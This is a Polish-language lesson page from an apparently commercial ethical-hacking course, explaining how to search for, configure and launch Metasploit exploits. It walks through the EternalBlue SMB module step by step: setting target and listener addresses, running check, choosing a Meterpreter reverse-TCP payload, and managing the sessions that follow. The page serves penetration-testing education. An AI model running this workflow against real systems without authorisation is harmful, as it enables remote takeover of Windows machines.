0Pricing
Ethical Hacking Academy · Lekcja

Wyszukiwanie i używanie exploitów

Znajdowanie i uruchamianie

Wyszukiwanie i używanie exploitów to bezpłatna lekcja Ethical Hacking Academy na CoddyKit. To lekcja 2 z 4. Możesz przeczytać całą lekcję poniżej za darmo — a potem ćwiczyć ją interaktywnie w przeglądarce z wbudowanym edytorem kodu i tutorem AI dostępnym 24/7. To część ścieżki edukacyjnej Ethical Hacking Academy, a Twój postęp synchronizuje się między webem a aplikacją CoddyKit. Kurs Ethical Hacking Academy zawiera 4 lekcji w sumie.

Od rozpoznania do exploita

Po skanowaniu znasz usługi i wersje działające na celu. Następnym krokiem jest znalezienie modułu exploita pasującego do znanej podatności w tych wersjach.

Polecenie search w Metasploit jest bramą do tysięcy modułów. Precyzyjne wyszukiwanie oszczędza czas i pomaga uniknąć uruchomienia niewłaściwego kodu.

Podstawowe wyszukiwanie

Polecenie search przeszukuje indeks modułów według słowa kluczowego. Można wyszukiwać według nazwy oprogramowania, numeru CVE lub usługi.

search eternalblue
search type:exploit platform:windows smb

Filtry wyszukiwania

Wyniki można zawężać za pomocą filtrów:

  • type: exploit, auxiliary, post.
  • platform: windows, linux, unix.
  • cve: konkretny identyfikator CVE.
  • rank: excellent, great, good (niezawodność).

Połączenie filtrów szybko zawęża tysiące modułów do kilku wyników.

search cve:2017-0144 type:exploit

Odczytywanie wyników wyszukiwania

Wyniki wyszukiwania zawierają każdy moduł wraz z informacją o rankingu, dacie ujawnienia i wskaźniku check. Ranking odzwierciedla niezawodność i bezpieczeństwo exploita.

  • excellent: małe prawdopodobieństwo awarii celu.
  • great/good: niezawodne w typowych warunkach.
  • low/manual: ryzykowne lub wymagające starannej konfiguracji.

Należy preferować moduły o wyższym rankingu, aby uniknąć awarii systemów produkcyjnych.

Ładowanie modułu

Proszę użyć numeru indeksu modułu lub pełnej ścieżki wraz z poleceniem use. Znak zachęty zmieni się, pokazując załadowany moduł, a magazyn danych będzie teraz zawierać opcje tego modułu.

use exploit/windows/smb/ms17_010_eternalblue
# msf6 exploit(windows/smb/ms17_010_eternalblue) >

Sprawdzanie modułu

Przed uruchomieniem należy zapoznać się z modułem. Polecenie info wyświetla opis, odwołania (CVE, ostrzeżenia), wymagane opcje i obsługiwane cele.

Zrozumienie działania modułu jest częścią profesjonalnego i odpowiedzialnego użycia; nigdy nie należy uruchamiać exploita, którego działania się nie rozumie.

info
show options
show targets

Ustawianie opcji

Proszę skonfigurować wymagane opcje za pomocą polecenia set. W przypadku zdalnego exploita najczęściej są to adres celu i ustawienia payloadu.

set RHOSTS 10.10.10.40
set RPORT 445
set LHOST 10.10.14.2

Polecenie check

Wiele exploitów obsługuje polecenie check, które bezpiecznie sprawdza, czy cel wydaje się podatny na atak, bez faktycznego wykorzystania tej podatności.

Uruchomienie check w pierwszej kolejności jest dobrą praktyką: zmniejsza ryzyko awarii systemu i potwierdza, że warto poświęcić czas na rzeczywistą możliwość przeprowadzenia ataku.

check
# [+] 10.10.10.40:445 - The target is vulnerable.

Wybór payloadu

Exploit wymaga payloadu. Metasploit wybiera domyślny payload, ale można wyświetlić listę i wybrać taki, który odpowiada celowi oraz wymaganiom dotyczącym poziomu dostępu.

show payloads
set PAYLOAD windows/x64/meterpreter/reverse_tcp

Uruchamianie i sesje

Uruchomienie następuje za pomocą polecenia exploit (lub run). Po pomyślnym wykonaniu uzyskuje się sesję, czyli interaktywne połączenie z celem.

Wiele sesji można obsługiwać za pomocą sessions -l, aby je wyświetlić, oraz sessions -i N, aby wejść w interakcję z wybraną sesją. Aby pozostawić sesję w tle i kontynuować pracę w konsoli, należy użyć polecenia background.

exploit
sessions -l
sessions -i 1

Opcje globalne a opcje modułu

Niektóre ustawienia, takie jak LHOST, są używane ponownie w wielu modułach. Należy ustawić je globalnie za pomocą setg, aby nie wpisywać ich ponownie przy każdej zmianie modułu.

  • set: obowiązuje tylko w bieżącym module.
  • setg: obowiązuje globalnie we wszystkich modułach.
  • unsetg: usuwa wartość globalną.

Pozwala to zaoszczędzić czas podczas długich testów obejmujących wiele modułów.

setg LHOST 10.10.14.2
setg RHOSTS 10.10.10.40

Szybkie sprawdzenie

Proszę wybrać odpowiedzialny krok wykonywany przed uruchomieniem exploita.

Podsumowanie

Nauczył(a) się Pan(i) znajdować i uruchamiać exploity:

  • Proszę używać polecenia search z filtrami (type, platform, cve, rank), aby znajdować moduły.
  • Ze względu na niezawodność i bezpieczeństwo należy preferować moduły o wyższym rank.
  • Za pomocą use można załadować moduł, za pomocą info/show options go sprawdzić, a za pomocą set skonfigurować.
  • Najpierw należy uruchomić check, a następnie exploit, aby uzyskać sesję.
  • Sesje można obsługiwać za pomocą sessions -l/-i.

Następnie: payloady i powłoka Meterpreter używana po uzyskaniu dostępu.

Często zadawane pytania

Czy lekcja „Wyszukiwanie i używanie exploitów” jest bezpłatna?

Tak — pełny tekst „Wyszukiwanie i używanie exploitów” jest dostępny za darmo tutaj w sieci. Aby ćwiczyć ją interaktywnie (wbudowany edytor kodu i tutor AI dostępny 24/7) i odblokować resztę kursu Ethical Hacking Academy, przejdź na CoddyKit PRO. Kurs Ethical Hacking Academy zawiera 4 lekcji w sumie.

Co nauczysz się w „Wyszukiwanie i używanie exploitów”?

Znajdowanie i uruchamianie Ćwiczysz Ethical Hacking Academy z praktycznym kodem, który uruchamiasz bezpośrednio w przeglądarce, a tutor AI dostępny 24/7 odpowiada na Twoje pytania podczas pracy nad lekcją.

Czy potrzebuję doświadczenia, aby zacząć Ethical Hacking Academy?

Nie wymagamy żadnego doświadczenia. Ethical Hacking Academy w CoddyKit jest strukturyzowany dla początkujących i zaawansowanych użytkowników, więc możesz zacząć tutaj lub od początku i uczyć się w swoim tempie. To lekcja 2 z 4.

Ile czasu zajmuje lekcja „Wyszukiwanie i używanie exploitów”?

Większość lekcji CoddyKit trwa około 5–10 minut. Każda lekcja to mały, interaktywny krok, dzięki czemu robisz systematyczne postępy i zawsze wracasz dokładnie do tego samego miejsca — na webie i w aplikacji.

Czy mogę pisać i uruchamiać kod w tej lekcji Ethical Hacking Academy?

Tak. Każda lekcja Ethical Hacking Academy zawiera wbudowany edytor kodu, więc piszesz i uruchamiasz prawdziwy kod bezpośrednio w przeglądarce i od razu otrzymujesz sprzężenie zwrotne od AI — bez konfiguracji na komputerze.

Wszystkie lekcje w tym kursie

  1. Architektura Metasploit
  2. Wyszukiwanie i używanie exploitów
  3. Payloady i Meterpreter
  4. Moduły po uzyskaniu dostępu
← Powrót do Ethical Hacking Academy